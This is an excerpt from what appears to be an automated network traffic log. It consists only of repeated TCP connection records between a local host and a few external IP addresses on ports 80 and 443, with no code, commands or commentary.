        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
